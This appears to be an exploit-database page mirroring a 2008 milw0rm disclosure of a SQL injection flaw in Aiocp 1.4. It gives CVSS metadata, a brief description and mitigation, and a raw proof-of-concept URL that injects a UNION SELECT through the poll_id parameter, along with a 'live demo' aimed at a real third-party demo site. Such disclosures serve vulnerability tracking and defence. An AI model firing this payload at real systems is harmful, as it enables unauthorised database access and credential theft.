header-logo
Suggest Exploit
vendor:
Aiocp 1.4
by:
ExSploiters
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Aiocp 1.4
Affected Version From: 1.4
Affected Version To: 1.4
Patch Exists: YES
Related CWE: N/A
CPE: a:aiocp:aiocp:1.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Aiocp 1.4 Remote SQL Injection vulnerability

Aiocp 1.4 is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to sensitive information stored in the database, such as user credentials and other sensitive data.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of Aiocp 1.4.
Source

Exploit-DB raw data:

###########################################
# Aiocp 1.4 Remote SQL Injection vulnerability
#
# Found by : ExSploiters
#
# Contact : exsploiters@gmail.com
#
# Download : http://sourceforge.net/project/showfiles.php?group_id=159137&package_id=178594&release_id=619157
###########################################

PoC :

http://[target]/[path]/public/code/cp_polls_results.php?poll_language=eng&poll_id=-0+union+select+0,1,2,version(),4,5,6--

L!ve Demo :

http://demo.opensourcecms.com/aiocp/public/code/cp_polls_results.php?poll_language=eng&poll_id=-0+union+select+0,1,2,version(),4,5,6--

Greetz :

no one =)

# milw0rm.com [2008-10-27]